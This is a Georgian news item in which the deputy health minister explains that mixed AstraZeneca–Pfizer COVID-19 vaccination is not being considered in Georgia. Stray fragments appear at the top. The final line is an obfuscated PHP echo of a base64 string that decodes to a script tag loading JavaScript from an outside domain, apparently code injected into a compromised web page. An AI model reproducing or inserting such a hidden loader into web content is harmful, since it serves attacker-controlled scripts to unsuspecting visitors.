celsiusi
ავერსი შნაიდერი
"ამ დროისთვის საქართველოში შერეული ვაქცინაცია არ განიხილება", - განცხადება ჯანდაცვის მინისტრის მოადგილე თამარ გაბუნიამ გააკეთა. მისი განმარტებით, მსოფლიოს არაერთი ქვეყანა მსჯელობს იმაზე, რომ „ასტრაზენეკას“ ერთი დოზით აცრილებმა მეორე დოზა „ფაიზერი“ გაიკეთონ.
 
"ასტრაზენეკას" მოწოდება მოკლე ხანებში დასრულდება. უკვე რეალურად გეგმა არსებობს, რომ დოზები არა -  „კოვაქსისგან“, არამედ სხვა წყაროებიდან მივიღოთ. იმედია, „კოვაქსიც“ აღარ გადაავადებს მოწოდებას. შერეულ მოდელს რაც შეეხება, ეს სხვადასხვა ქვეყანაში აქტიურად განიხილება. მონაცემები იმასაც კი ადასტურებს, რომ „ასტრაზენეკათი“ და „ფაიზერით“ ვაქცინაცია, შესაძლოა, მყარ იმუნიტეტს გვაძლევდეს. 
 
ჩვენ შემთხვევაში ამ ტიპის მოდელი გათვალისწინებული არ არის. ამასთან დაკავშირებით იმუნიზაციის ტექნიკური ჯგუფი იმსჯელებს. არ ვფიქრობ, რომ ჩვენ ეს გადაწყვეტილება დაგვჭირდება როგორ გამოსავალი, „ასტრაზენეკას“ ვაქცინის დეფიციტის გამო, თუმცა თუ ჯანმო ამ რეკომენდაციას ფართოდ გასცემს, მაშინ ჩვენი ექსპერტების ჯგუფი იმსჯელებს, რამდენად შეგვიძლია, პროგრამულად ამ მოდელზე ვიმსჯელოთ", - განაცხადა თამარ გაბუნიამ.
1012
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");